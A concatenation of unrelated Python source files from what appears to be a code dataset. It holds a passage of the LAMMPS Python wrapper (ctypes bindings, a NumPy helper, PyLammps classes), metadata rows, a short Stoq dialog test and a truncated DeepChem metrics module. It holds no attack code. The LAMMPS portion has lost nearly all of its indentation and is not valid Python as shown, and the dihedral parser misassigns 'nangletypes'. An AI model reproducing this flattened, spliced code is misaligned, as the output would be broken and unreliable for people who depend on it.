self.lmp = c_void_p(pythonapi.PyCObject_AsVoidPtr(ptr))
# optional numpy support (lazy loading)
self._numpy = None
# set default types
self.c_bigint = get_ctypes_int(self.extract_setting("bigint"))
self.c_tagint = get_ctypes_int(self.extract_setting("tagint"))
self.c_imageint = get_ctypes_int(self.extract_setting("imageint"))
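  # Hedged usage sketch (requires a loadable liblammps shared library):
  #   lmp = lammps(cmdargs=["-log", "none"])
  #   lmp.command("units lj")
  #   lmp.close()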
# shut-down LAMMPS instance
def __del__(self):
if self.lmp and self.opened:
self.lib.lammps_close(self.lmp)
self.opened = 0
def close(self):
if self.opened: self.lib.lammps_close(self.lmp)
self.lmp = None
self.opened = 0
def version(self):
return self.lib.lammps_version(self.lmp)
def file(self,file):
if file: file = file.encode()
self.lib.lammps_file(self.lmp,file)
# send a single command
def command(self,cmd):
if cmd: cmd = cmd.encode()
self.lib.lammps_command(self.lmp,cmd)
if self.uses_exceptions and self.lib.lammps_has_error(self.lmp):
sb = create_string_buffer(100)
error_type = self.lib.lammps_get_last_error_message(self.lmp, sb, 100)
error_msg = sb.value.decode().strip()
if error_type == 2:
raise MPIAbortException(error_msg)
raise Exception(error_msg)
# send a list of commands
def commands_list(self,cmdlist):
    cmds = [x.encode() if type(x) is str else x for x in cmdlist]
    args = (c_char_p * len(cmdlist))(*cmds)
self.lib.lammps_commands_list(self.lmp,len(cmdlist),args)
# send a string of commands
def commands_string(self,multicmd):
if type(multicmd) is str: multicmd = multicmd.encode()
self.lib.lammps_commands_string(self.lmp,c_char_p(multicmd))
# extract lammps type byte sizes
def extract_setting(self, name):
if name: name = name.encode()
    self.lib.lammps_extract_setting.restype = c_int
return int(self.lib.lammps_extract_setting(self.lmp,name))
# extract global info
def extract_global(self,name,type):
if name: name = name.encode()
if type == 0:
self.lib.lammps_extract_global.restype = POINTER(c_int)
elif type == 1:
self.lib.lammps_extract_global.restype = POINTER(c_double)
else: return None
ptr = self.lib.lammps_extract_global(self.lmp,name)
return ptr[0]
# extract global info
def extract_box(self):
boxlo = (3*c_double)()
boxhi = (3*c_double)()
xy = c_double()
yz = c_double()
xz = c_double()
periodicity = (3*c_int)()
box_change = c_int()
self.lib.lammps_extract_box(self.lmp,boxlo,boxhi,
byref(xy),byref(yz),byref(xz),
periodicity,byref(box_change))
boxlo = boxlo[:3]
boxhi = boxhi[:3]
xy = xy.value
yz = yz.value
xz = xz.value
periodicity = periodicity[:3]
box_change = box_change.value
return boxlo,boxhi,xy,yz,xz,periodicity,box_change
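  # Hedged sketch: unpack the tuple returned by extract_box(), e.g.
  #   boxlo, boxhi, xy, yz, xz, periodicity, box_change = lmp.extract_box()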
# extract per-atom info
  # NOTE: need to ensure we are converting to/from the correct Python type
# e.g. for Python list or NumPy or ctypes
def extract_atom(self,name,type):
if name: name = name.encode()
if type == 0:
self.lib.lammps_extract_atom.restype = POINTER(c_int)
elif type == 1:
self.lib.lammps_extract_atom.restype = POINTER(POINTER(c_int))
elif type == 2:
self.lib.lammps_extract_atom.restype = POINTER(c_double)
elif type == 3:
self.lib.lammps_extract_atom.restype = POINTER(POINTER(c_double))
else: return None
ptr = self.lib.lammps_extract_atom(self.lmp,name)
return ptr
@property
def numpy(self):
if not self._numpy:
import numpy as np
class LammpsNumpyWrapper:
def __init__(self, lmp):
self.lmp = lmp
def _ctype_to_numpy_int(self, ctype_int):
if ctype_int == c_int32:
return np.int32
elif ctype_int == c_int64:
return np.int64
return np.intc
def extract_atom_iarray(self, name, nelem, dim=1):
if name in ['id', 'molecule']:
c_int_type = self.lmp.c_tagint
elif name in ['image']:
c_int_type = self.lmp.c_imageint
else:
c_int_type = c_int
np_int_type = self._ctype_to_numpy_int(c_int_type)
if dim == 1:
tmp = self.lmp.extract_atom(name, 0)
ptr = cast(tmp, POINTER(c_int_type * nelem))
else:
tmp = self.lmp.extract_atom(name, 1)
ptr = cast(tmp[0], POINTER(c_int_type * nelem * dim))
a = np.frombuffer(ptr.contents, dtype=np_int_type)
a.shape = (nelem, dim)
return a
def extract_atom_darray(self, name, nelem, dim=1):
if dim == 1:
tmp = self.lmp.extract_atom(name, 2)
ptr = cast(tmp, POINTER(c_double * nelem))
else:
tmp = self.lmp.extract_atom(name, 3)
ptr = cast(tmp[0], POINTER(c_double * nelem * dim))
a = np.frombuffer(ptr.contents)
a.shape = (nelem, dim)
return a
self._numpy = LammpsNumpyWrapper(self)
return self._numpy
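  # Hedged usage sketch (assumes NumPy is installed and atoms are defined):
  #   n = lmp.get_natoms()
  #   x = lmp.numpy.extract_atom_darray("x", n, dim=3)   # zero-copy view
  #   ids = lmp.numpy.extract_atom_iarray("id", n)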
# extract compute info
def extract_compute(self,id,style,type):
if id: id = id.encode()
if type == 0:
if style > 0: return None
self.lib.lammps_extract_compute.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr[0]
if type == 1:
self.lib.lammps_extract_compute.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr
if type == 2:
if style == 0:
self.lib.lammps_extract_compute.restype = POINTER(c_int)
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr[0]
else:
self.lib.lammps_extract_compute.restype = POINTER(POINTER(c_double))
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr
return None
# extract fix info
# in case of global datum, free memory for 1 double via lammps_free()
# double was allocated by library interface function
def extract_fix(self,id,style,type,i=0,j=0):
if id: id = id.encode()
if style == 0:
self.lib.lammps_extract_fix.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_fix(self.lmp,id,style,type,i,j)
result = ptr[0]
self.lib.lammps_free(ptr)
return result
elif (style == 1) or (style == 2):
if type == 1:
self.lib.lammps_extract_fix.restype = POINTER(c_double)
elif type == 2:
self.lib.lammps_extract_fix.restype = POINTER(POINTER(c_double))
else:
return None
ptr = self.lib.lammps_extract_fix(self.lmp,id,style,type,i,j)
return ptr
else:
return None
# extract variable info
# free memory for 1 double or 1 vector of doubles via lammps_free()
# for vector, must copy nlocal returned values to local c_double vector
# memory was allocated by library interface function
def extract_variable(self,name,group,type):
if name: name = name.encode()
if group: group = group.encode()
if type == 0:
self.lib.lammps_extract_variable.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_variable(self.lmp,name,group)
result = ptr[0]
self.lib.lammps_free(ptr)
return result
if type == 1:
self.lib.lammps_extract_global.restype = POINTER(c_int)
nlocalptr = self.lib.lammps_extract_global(self.lmp,"nlocal".encode())
nlocal = nlocalptr[0]
result = (c_double*nlocal)()
self.lib.lammps_extract_variable.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_variable(self.lmp,name,group)
for i in range(nlocal): result[i] = ptr[i]
self.lib.lammps_free(ptr)
return result
return None
# return current value of thermo keyword
def get_thermo(self,name):
if name: name = name.encode()
self.lib.lammps_get_thermo.restype = c_double
return self.lib.lammps_get_thermo(self.lmp,name)
# return total number of atoms in system
def get_natoms(self):
return self.lib.lammps_get_natoms(self.lmp)
# set variable value
# value is converted to string
# returns 0 for success, -1 if failed
def set_variable(self,name,value):
if name: name = name.encode()
if value: value = str(value).encode()
return self.lib.lammps_set_variable(self.lmp,name,value)
# reset simulation box size
def reset_box(self,boxlo,boxhi,xy,yz,xz):
cboxlo = (3*c_double)(*boxlo)
cboxhi = (3*c_double)(*boxhi)
self.lib.lammps_reset_box(self.lmp,cboxlo,cboxhi,xy,yz,xz)
# return vector of atom properties gathered across procs
# 3 variants to match src/library.cpp
# name = atom property recognized by LAMMPS in atom->extract()
# type = 0 for integer values, 1 for double values
  # count = number of per-atom values, 1 for type or charge, 3 for x or f
# returned data is a 1d vector - doc how it is ordered?
  # NOTE: need to ensure we are converting to/from the correct Python type
# e.g. for Python list or NumPy or ctypes
def gather_atoms(self,name,type,count):
if name: name = name.encode()
natoms = self.lib.lammps_get_natoms(self.lmp)
if type == 0:
data = ((count*natoms)*c_int)()
self.lib.lammps_gather_atoms(self.lmp,name,type,count,data)
elif type == 1:
data = ((count*natoms)*c_double)()
self.lib.lammps_gather_atoms(self.lmp,name,type,count,data)
else: return None
return data
def gather_atoms_concat(self,name,type,count):
if name: name = name.encode()
natoms = self.lib.lammps_get_natoms(self.lmp)
if type == 0:
data = ((count*natoms)*c_int)()
self.lib.lammps_gather_atoms_concat(self.lmp,name,type,count,data)
elif type == 1:
data = ((count*natoms)*c_double)()
self.lib.lammps_gather_atoms_concat(self.lmp,name,type,count,data)
else: return None
return data
def gather_atoms_subset(self,name,type,count,ndata,ids):
if name: name = name.encode()
if type == 0:
data = ((count*ndata)*c_int)()
self.lib.lammps_gather_atoms_subset(self.lmp,name,type,count,ndata,ids,data)
elif type == 1:
data = ((count*ndata)*c_double)()
self.lib.lammps_gather_atoms_subset(self.lmp,name,type,count,ndata,ids,data)
else: return None
return data
# scatter vector of atom properties across procs
# 2 variants to match src/library.cpp
# name = atom property recognized by LAMMPS in atom->extract()
# type = 0 for integer values, 1 for double values
  # count = number of per-atom values, 1 for type or charge, 3 for x or f
# assume data is of correct type and length, as created by gather_atoms()
  # NOTE: need to ensure we are converting to/from the correct Python type
# e.g. for Python list or NumPy or ctypes
def scatter_atoms(self,name,type,count,data):
if name: name = name.encode()
self.lib.lammps_scatter_atoms(self.lmp,name,type,count,data)
def scatter_atoms_subset(self,name,type,count,ndata,ids,data):
if name: name = name.encode()
self.lib.lammps_scatter_atoms_subset(self.lmp,name,type,count,ndata,ids,data)
# create N atoms on all procs
# N = global number of atoms
# id = ID of each atom (optional, can be None)
# type = type of each atom (1 to Ntypes) (required)
# x = coords of each atom as (N,3) array (required)
# v = velocity of each atom as (N,3) array (optional, can be None)
  # NOTE: how could we ensure we are passing the correct type to LAMMPS
# e.g. for Python list or NumPy, etc
# ditto for gather_atoms() above
def create_atoms(self,n,id,type,x,v,image=None,shrinkexceed=False):
if id:
id_lmp = (c_int * n)()
id_lmp[:] = id
else:
id_lmp = id
if image:
image_lmp = (c_int * n)()
image_lmp[:] = image
else:
image_lmp = image
type_lmp = (c_int * n)()
type_lmp[:] = type
self.lib.lammps_create_atoms(self.lmp,n,id_lmp,type_lmp,x,v,image_lmp,
shrinkexceed)
@property
def uses_exceptions(self):
""" Return whether the LAMMPS shared library was compiled with C++ exceptions handling enabled """
try:
if self.lib.lammps_has_error:
return True
except(AttributeError):
return False
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
################################################################################
# Alternative Python Wrapper
# Written by Richard Berger <richard.berger@temple.edu>
################################################################################
class OutputCapture(object):
""" Utility class to capture LAMMPS library output """
def __init__(self):
self.stdout_pipe_read, self.stdout_pipe_write = os.pipe()
self.stdout_fd = 1
def __enter__(self):
self.stdout = os.dup(self.stdout_fd)
os.dup2(self.stdout_pipe_write, self.stdout_fd)
return self
  def __exit__(self, exc_type, exc_value, exc_traceback):
os.dup2(self.stdout, self.stdout_fd)
os.close(self.stdout)
os.close(self.stdout_pipe_read)
os.close(self.stdout_pipe_write)
# check if we have more to read from the pipe
def more_data(self, pipe):
r, _, _ = select.select([pipe], [], [], 0)
return bool(r)
# read the whole pipe
def read_pipe(self, pipe):
out = ""
while self.more_data(pipe):
out += os.read(pipe, 1024).decode()
return out
@property
def output(self):
return self.read_pipe(self.stdout_pipe_read)
class Variable(object):
def __init__(self, lammps_wrapper_instance, name, style, definition):
self.wrapper = lammps_wrapper_instance
self.name = name
self.style = style
self.definition = definition.split()
@property
def value(self):
if self.style == 'atom':
return list(self.wrapper.lmp.extract_variable(self.name, "all", 1))
else:
value = self.wrapper.lmp_print('"${%s}"' % self.name).strip()
try:
return float(value)
except ValueError:
return value
class AtomList(object):
def __init__(self, lammps_wrapper_instance):
self.lmp = lammps_wrapper_instance
self.natoms = self.lmp.system.natoms
self.dimensions = self.lmp.system.dimensions
def __getitem__(self, index):
if self.dimensions == 2:
return Atom2D(self.lmp, index + 1)
return Atom(self.lmp, index + 1)
class Atom(object):
def __init__(self, lammps_wrapper_instance, index):
self.lmp = lammps_wrapper_instance
self.index = index
@property
def id(self):
return int(self.lmp.eval("id[%d]" % self.index))
@property
def type(self):
return int(self.lmp.eval("type[%d]" % self.index))
@property
def mol(self):
return self.lmp.eval("mol[%d]" % self.index)
@property
def mass(self):
return self.lmp.eval("mass[%d]" % self.index)
@property
def position(self):
return (self.lmp.eval("x[%d]" % self.index),
self.lmp.eval("y[%d]" % self.index),
self.lmp.eval("z[%d]" % self.index))
@position.setter
def position(self, value):
self.lmp.set("atom", self.index, "x", value[0])
self.lmp.set("atom", self.index, "y", value[1])
self.lmp.set("atom", self.index, "z", value[2])
@property
def velocity(self):
return (self.lmp.eval("vx[%d]" % self.index),
self.lmp.eval("vy[%d]" % self.index),
self.lmp.eval("vz[%d]" % self.index))
@property
def force(self):
return (self.lmp.eval("fx[%d]" % self.index),
self.lmp.eval("fy[%d]" % self.index),
self.lmp.eval("fz[%d]" % self.index))
@property
def charge(self):
return self.lmp.eval("q[%d]" % self.index)
class Atom2D(Atom):
def __init__(self, lammps_wrapper_instance, index):
super(Atom2D, self).__init__(lammps_wrapper_instance, index)
@property
def position(self):
return (self.lmp.eval("x[%d]" % self.index),
self.lmp.eval("y[%d]" % self.index))
@position.setter
def position(self, value):
self.lmp.set("atom", self.index, "x", value[0])
self.lmp.set("atom", self.index, "y", value[1])
@property
def velocity(self):
return (self.lmp.eval("vx[%d]" % self.index),
self.lmp.eval("vy[%d]" % self.index))
@property
def force(self):
return (self.lmp.eval("fx[%d]" % self.index),
self.lmp.eval("fy[%d]" % self.index))
class variable_set:
def __init__(self, name, variable_dict):
self._name = name
array_pattern = re.compile(r"(?P<arr>.+)\[(?P<index>[0-9]+)\]")
for key, value in variable_dict.items():
m = array_pattern.match(key)
if m:
g = m.groupdict()
varname = g['arr']
idx = int(g['index'])
if varname not in self.__dict__:
self.__dict__[varname] = {}
self.__dict__[varname][idx] = value
else:
self.__dict__[key] = value
def __str__(self):
return "{}({})".format(self._name, ','.join(["{}={}".format(k, self.__dict__[k]) for k in self.__dict__.keys() if not k.startswith('_')]))
def __repr__(self):
return self.__str__()
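# A short worked example of the key flattening above: indexed names such as
# "b[1]" are folded into per-name dictionaries.
#
#   vs = variable_set('Example', {'a': 1.0, 'b[1]': 2.0, 'b[2]': 3.0})
#   vs.a       # 1.0
#   vs.b[2]    # 3.0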
def get_thermo_data(output):
""" traverse output of runs and extract thermo data columns """
if isinstance(output, str):
lines = output.splitlines()
else:
lines = output
runs = []
columns = []
in_run = False
current_run = {}
for line in lines:
if line.startswith("Per MPI rank memory allocation"):
in_run = True
elif in_run and len(columns) == 0:
      # the first line after the memory-usage line holds the column names
columns = line.split()
current_run = {}
for col in columns:
current_run[col] = []
elif line.startswith("Loop time of "):
in_run = False
columns = None
thermo_data = variable_set('ThermoData', current_run)
r = {'thermo' : thermo_data }
runs.append(namedtuple('Run', list(r.keys()))(*list(r.values())))
elif in_run and len(columns) > 0:
values = [float(x) for x in line.split()]
for i, col in enumerate(columns):
current_run[col].append(values[i])
return runs
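# A minimal sketch with a hand-written log fragment (format assumed from a
# standard LAMMPS thermo block):
#
#   log = ("Per MPI rank memory allocation ...\n"
#          "Step Temp E_pair\n"
#          "0 1.0 -6.7\n"
#          "10 0.9 -6.6\n"
#          "Loop time of 0.01 on 1 procs\n")
#   runs = get_thermo_data(log)
#   runs[0].thermo.Step   # [0.0, 10.0]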
class PyLammps(object):
"""
  More Python-like wrapper for LAMMPS (e.g., for IPython)
See examples/ipython for usage
"""
def __init__(self,name="",cmdargs=None,ptr=None,comm=None):
if ptr:
if isinstance(ptr,PyLammps):
self.lmp = ptr.lmp
elif isinstance(ptr,lammps):
self.lmp = ptr
else:
self.lmp = lammps(name=name,cmdargs=cmdargs,ptr=ptr,comm=comm)
else:
self.lmp = lammps(name=name,cmdargs=cmdargs,ptr=None,comm=comm)
print("LAMMPS output is captured by PyLammps wrapper")
self._cmd_history = []
self.runs = []
def __del__(self):
if self.lmp: self.lmp.close()
self.lmp = None
def close(self):
if self.lmp: self.lmp.close()
self.lmp = None
def version(self):
return self.lmp.version()
def file(self,file):
self.lmp.file(file)
def write_script(self,filename):
""" Write LAMMPS script file containing all commands executed up until now """
with open(filename, "w") as f:
for cmd in self._cmd_history:
f.write("%s\n" % cmd)
def command(self,cmd):
self.lmp.command(cmd)
self._cmd_history.append(cmd)
def run(self, *args, **kwargs):
output = self.__getattr__('run')(*args, **kwargs)
self.runs += get_thermo_data(output)
return output
@property
def last_run(self):
if len(self.runs) > 0:
return self.runs[-1]
return None
@property
def atoms(self):
return AtomList(self)
@property
def system(self):
output = self.info("system")
d = self._parse_info_system(output)
return namedtuple('System', d.keys())(*d.values())
@property
def communication(self):
output = self.info("communication")
d = self._parse_info_communication(output)
return namedtuple('Communication', d.keys())(*d.values())
@property
def computes(self):
output = self.info("computes")
return self._parse_element_list(output)
@property
def dumps(self):
output = self.info("dumps")
return self._parse_element_list(output)
@property
def fixes(self):
output = self.info("fixes")
return self._parse_element_list(output)
@property
def groups(self):
output = self.info("groups")
return self._parse_groups(output)
@property
def variables(self):
output = self.info("variables")
vars = {}
for v in self._parse_element_list(output):
vars[v['name']] = Variable(self, v['name'], v['style'], v['def'])
return vars
def eval(self, expr):
value = self.lmp_print('"$(%s)"' % expr).strip()
try:
return float(value)
except ValueError:
return value
def _split_values(self, line):
return [x.strip() for x in line.split(',')]
def _get_pair(self, value):
return [x.strip() for x in value.split('=')]
def _parse_info_system(self, output):
lines = output[6:-2]
system = {}
for line in lines:
if line.startswith("Units"):
system['units'] = self._get_pair(line)[1]
elif line.startswith("Atom style"):
system['atom_style'] = self._get_pair(line)[1]
elif line.startswith("Atom map"):
system['atom_map'] = self._get_pair(line)[1]
elif line.startswith("Atoms"):
parts = self._split_values(line)
system['natoms'] = int(self._get_pair(parts[0])[1])
system['ntypes'] = int(self._get_pair(parts[1])[1])
system['style'] = self._get_pair(parts[2])[1]
elif line.startswith("Kspace style"):
system['kspace_style'] = self._get_pair(line)[1]
elif line.startswith("Dimensions"):
system['dimensions'] = int(self._get_pair(line)[1])
elif line.startswith("Orthogonal box"):
system['orthogonal_box'] = [float(x) for x in self._get_pair(line)[1].split('x')]
elif line.startswith("Boundaries"):
system['boundaries'] = self._get_pair(line)[1]
elif line.startswith("xlo"):
keys, values = [self._split_values(x) for x in self._get_pair(line)]
for key, value in zip(keys, values):
system[key] = float(value)
elif line.startswith("ylo"):
keys, values = [self._split_values(x) for x in self._get_pair(line)]
for key, value in zip(keys, values):
system[key] = float(value)
elif line.startswith("zlo"):
keys, values = [self._split_values(x) for x in self._get_pair(line)]
for key, value in zip(keys, values):
system[key] = float(value)
elif line.startswith("Molecule type"):
system['molecule_type'] = self._get_pair(line)[1]
elif line.startswith("Bonds"):
parts = self._split_values(line)
system['nbonds'] = int(self._get_pair(parts[0])[1])
system['nbondtypes'] = int(self._get_pair(parts[1])[1])
system['bond_style'] = self._get_pair(parts[2])[1]
elif line.startswith("Angles"):
parts = self._split_values(line)
system['nangles'] = int(self._get_pair(parts[0])[1])
system['nangletypes'] = int(self._get_pair(parts[1])[1])
system['angle_style'] = self._get_pair(parts[2])[1]
elif line.startswith("Dihedrals"):
parts = self._split_values(line)
system['ndihedrals'] = int(self._get_pair(parts[0])[1])
system['nangletypes'] = int(self._get_pair(parts[1])[1])
system['dihedral_style'] = self._get_pair(parts[2])[1]
elif line.startswith("Impropers"):
parts = self._split_values(line)
system['nimpropers'] = int(self._get_pair(parts[0])[1])
system['nimpropertypes'] = int(self._get_pair(parts[1])[1])
system['improper_style'] = self._get_pair(parts[2])[1]
return system
def _parse_info_communication(self, output):
lines = output[6:-3]
comm = {}
for line in lines:
if line.startswith("MPI library"):
comm['mpi_version'] = line.split(':')[1].strip()
elif line.startswith("Comm style"):
parts = self._split_values(line)
comm['comm_style'] = self._get_pair(parts[0])[1]
comm['comm_layout'] = self._get_pair(parts[1])[1]
elif line.startswith("Processor grid"):
comm['proc_grid'] = [int(x) for x in self._get_pair(line)[1].split('x')]
elif line.startswith("Communicate velocities for ghost atoms"):
comm['ghost_velocity'] = (self._get_pair(line)[1] == "yes")
elif line.startswith("Nprocs"):
parts = self._split_values(line)
comm['nprocs'] = int(self._get_pair(parts[0])[1])
comm['nthreads'] = int(self._get_pair(parts[1])[1])
return comm
def _parse_element_list(self, output):
lines = output[6:-3]
elements = []
for line in lines:
element_info = self._split_values(line.split(':')[1].strip())
element = {'name': element_info[0]}
for key, value in [self._get_pair(x) for x in element_info[1:]]:
element[key] = value
elements.append(element)
return elements
def _parse_groups(self, output):
lines = output[6:-3]
groups = []
group_pattern = re.compile(r"(?P<name>.+) \((?P<type>.+)\)")
for line in lines:
m = group_pattern.match(line.split(':')[1].strip())
group = {'name': m.group('name'), 'type': m.group('type')}
groups.append(group)
return groups
def lmp_print(self, s):
""" needed for Python2 compatibility, since print is a reserved keyword """
return self.__getattr__("print")(s)
def __dir__(self):
    return ['angle_coeff', 'angle_style', 'atom_modify', 'atom_style',
'bond_coeff', 'bond_style', 'boundary', 'change_box', 'communicate', 'compute',
'create_atoms', 'create_box', 'delete_atoms', 'delete_bonds', 'dielectric',
'dihedral_coeff', 'dihedral_style', 'dimension', 'dump', 'fix', 'fix_modify',
'group', 'improper_coeff', 'improper_style', 'include', 'kspace_modify',
'kspace_style', 'lattice', 'mass', 'minimize', 'min_style', 'neighbor',
'neigh_modify', 'newton', 'nthreads', 'pair_coeff', 'pair_modify',
'pair_style', 'processors', 'read', 'read_data', 'read_restart', 'region',
'replicate', 'reset_timestep', 'restart', 'run', 'run_style', 'thermo',
'thermo_modify', 'thermo_style', 'timestep', 'undump', 'unfix', 'units',
'variable', 'velocity', 'write_restart']
def __getattr__(self, name):
def handler(*args, **kwargs):
cmd_args = [name] + [str(x) for x in args]
with OutputCapture() as capture:
self.command(' '.join(cmd_args))
output = capture.output
if 'verbose' in kwargs and kwargs['verbose']:
print(output)
lines = output.splitlines()
if len(lines) > 1:
return lines
elif len(lines) == 1:
return lines[0]
return None
return handler
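# A minimal usage sketch: unknown attribute lookups on PyLammps become
# LAMMPS commands, so most of the input-script language maps directly to
# method calls.
#
#   L = PyLammps()
#   L.units("lj")
#   L.atom_style("atomic")
#   L.lattice("fcc", 0.8442)
#   L.region("box block", 0, 4, 0, 4, 0, 4)
#   L.create_box(1, "box")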
class IPyLammps(PyLammps):
"""
iPython wrapper for LAMMPS which adds embedded graphics capabilities
"""
def __init__(self,name="",cmdargs=None,ptr=None,comm=None):
super(IPyLammps, self).__init__(name=name,cmdargs=cmdargs,ptr=ptr,comm=comm)
def image(self, filename="snapshot.png", group="all", color="type", diameter="type",
size=None, view=None, center=None, up=None, zoom=1.0):
cmd_args = [group, "image", filename, color, diameter]
if size:
width = size[0]
height = size[1]
cmd_args += ["size", width, height]
if view:
theta = view[0]
phi = view[1]
cmd_args += ["view", theta, phi]
if center:
flag = center[0]
Cx = center[1]
Cy = center[2]
Cz = center[3]
cmd_args += ["center", flag, Cx, Cy, Cz]
if up:
Ux = up[0]
Uy = up[1]
Uz = up[2]
cmd_args += ["up", Ux, Uy, Uz]
if zoom:
cmd_args += ["zoom", zoom]
cmd_args.append("modify backcolor white")
self.write_dump(*cmd_args)
from IPython.core.display import Image
    return Image(filename)
def video(self, filename):
from IPython.display import HTML
return HTML("<video controls><source src=\"" + filename + "\"></video>")
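# A minimal sketch of the graphics helpers above (inside a Jupyter/IPython
# session, after a system has been set up):
#
#   L = IPyLammps()
#   # ... define units, box, and atoms ...
#   L.image(filename="snapshot.png", zoom=1.5)   # renders and embeds a PNG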
|
yidongxiainl/lammps
|
python/lammps.py
|
Python
|
gpl-2.0
| 35,412
|
[
"LAMMPS"
] |
2efadae96b621ae14fa44a9875c214d7835db8e481f5a84689eada5d086bfd68
|
# -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2012 Async Open Source <http://www.async.com.br>
## All rights reserved
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
## Author(s): Stoq Team <stoq-devel@async.com.br>
##
from stoqlib.gui.dialogs.crashreportdialog import CrashReportDialog
from stoqlib.gui.test.uitestutils import GUITest
class TestCrashReportDialog(GUITest):
def test_show(self):
dialog = CrashReportDialog(None)
self.check_dialog(dialog._dialog, 'dialog-crash-report')
|
andrebellafronte/stoq
|
stoqlib/gui/test/test_crashreportdialog.py
|
Python
|
gpl-2.0
| 1,180
|
[
"VisIt"
] |
2a6d145ba5e48d4cf9a990e416d221dff1aea971c9f54a1584b98a14c5162ec3
|
"""Evaluation metrics."""
import numpy as np
from sklearn.metrics import matthews_corrcoef # noqa
from sklearn.metrics import recall_score # noqa
from sklearn.metrics import cohen_kappa_score
from sklearn.metrics import r2_score # noqa
from sklearn.metrics import mean_squared_error
from sklearn.metrics import mean_absolute_error
from sklearn.metrics import precision_score # noqa
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import auc
from sklearn.metrics import jaccard_score
from sklearn.metrics import f1_score
from sklearn.metrics import roc_auc_score # noqa
from sklearn.metrics import accuracy_score # noqa
from sklearn.metrics import balanced_accuracy_score # noqa
from scipy.stats import pearsonr
# kappa_score is an alias for `sklearn.metrics.cohen_kappa_score`
kappa_score = cohen_kappa_score
def pearson_r2_score(y: np.ndarray, y_pred: np.ndarray) -> float:
"""Computes Pearson R^2 (square of Pearson correlation).
Parameters
----------
y: np.ndarray
ground truth array
y_pred: np.ndarray
predicted array
Returns
-------
float
The Pearson-R^2 score.
"""
return pearsonr(y, y_pred)[0]**2
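# A short sanity check (values chosen by hand): a perfectly linear
# relationship gives a Pearson R^2 of 1.
#
#   pearson_r2_score(np.array([1.0, 2.0, 3.0]), np.array([2.0, 4.0, 6.0]))
#   # -> 1.0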
def jaccard_index(y: np.ndarray, y_pred: np.ndarray) -> float:
"""Computes Jaccard Index which is the Intersection Over Union metric
which is commonly used in image segmentation tasks.
  DEPRECATED: WILL BE REMOVED IN A FUTURE VERSION OF DEEPCHEM. USE `jaccard_score` instead.
Parameters
----------
y: np.ndarray
ground truth array
y_pred: np.ndarray
predicted array
Returns
-------
score: float
The jaccard index. A number between 0 and 1.
"""
return jaccard_score(y, y_pred)
def pixel_error(y: np.ndarray, y_pred: np.ndarray) -> float:
"""An error metric in case y, y_pred are images.
Defined as 1 - the maximal F-score of pixel similarity, or squared
Euclidean distance between the original and the result labels.
Parameters
----------
y: np.ndarray
ground truth array
y_pred: np.ndarray
predicted array
Returns
-------
score: float
The pixel-error. A number between 0 and 1.
"""
return 1 - f1_score(y, y_pred)
def prc_auc_score(y: np.ndarray, y_pred: np.ndarray) -> float:
"""Compute area under precision-recall curve
Parameters
----------
y: np.ndarray
A numpy array of shape `(N, n_classes)` or `(N,)` with true labels
y_pred: np.ndarray
Of shape `(N, n_classes)` with class probabilities.
Returns
-------
float
The area under the precision-recall curve. A number between 0 and 1.
"""
precision, recall, _ = precision_recall_curve(y[:, 1], y_pred[:, 1])
return auc(recall, precision)
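# A minimal sketch of the expected shapes (one-hot labels and per-class
# probabilities, hence the [:, 1] indexing above):
#
#   y = np.array([[1, 0], [0, 1], [0, 1]])
#   y_pred = np.array([[0.9, 0.1], [0.2, 0.8], [0.4, 0.6]])
#   prc_auc_score(y, y_pred)   # -> 1.0 for this perfect ranking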
def rms_score(y_true: np.ndarray, y_pred: np.ndarray) -> float:
"""Computes RMS error."""
return np.sqrt(mean_squared_error(y_true, y_pred))
def mae_score(y_true: np.ndarray, y_pred: np.ndarray) -> float:
"""Computes MAE."""
return mean_absolute_error(y_true, y_pred)
def bedroc_score(y_true: np.ndarray, y_pred: np.ndarray, alpha: float = 20.0):
"""Compute BEDROC metric.
  BEDROC metric implemented according to Truchon and Bayly, which modifies
  the ROC score to account for a factor of early recognition.
  See [1]_ for details.
Parameters
----------
y_true: np.ndarray
Binary class labels. 1 for positive class, 0 otherwise
y_pred: np.ndarray
Predicted labels
alpha: float, default 20.0
Early recognition parameter
Returns
-------
float
Value in [0, 1] that indicates the degree of early recognition
Notes
-----
This function requires RDKit to be installed.
References
----------
.. [1] Truchon et al. "Evaluating virtual screening methods: good and bad metrics
for the “early recognition” problem." Journal of chemical information and modeling
47.2 (2007): 488-508.
"""
try:
from rdkit.ML.Scoring.Scoring import CalcBEDROC
except ModuleNotFoundError:
raise ImportError("This function requires RDKit to be installed.")
# validation
  assert len(y_true) == len(y_pred), 'Numbers of examples do not match'
assert np.array_equal(
np.unique(y_true).astype(int),
[0, 1]), ('Class labels must be binary: %s' % np.unique(y_true))
yt = np.asarray(y_true)
yp = np.asarray(y_pred)
yt = yt.flatten()
yp = yp[:, 1].flatten() # Index 1 because one_hot predictions
scores = list(zip(yt, yp))
scores = sorted(scores, key=lambda pair: pair[1], reverse=True)
return CalcBEDROC(scores, 0, alpha)
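# A minimal sketch (requires RDKit; y_pred follows the one-hot layout noted
# above):
#
#   y_true = np.array([1, 0, 1, 0])
#   y_pred = np.array([[0.1, 0.9], [0.8, 0.2], [0.3, 0.7], [0.6, 0.4]])
#   bedroc_score(y_true, y_pred)   # close to 1.0 for this perfect ranking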
def concordance_index(y_true: np.ndarray, y_pred: np.ndarray) -> float:
"""Compute Concordance index.
  A statistical metric that indicates the quality of the predicted ranking.
  See [1]_ for details.
Parameters
----------
y_true: np.ndarray
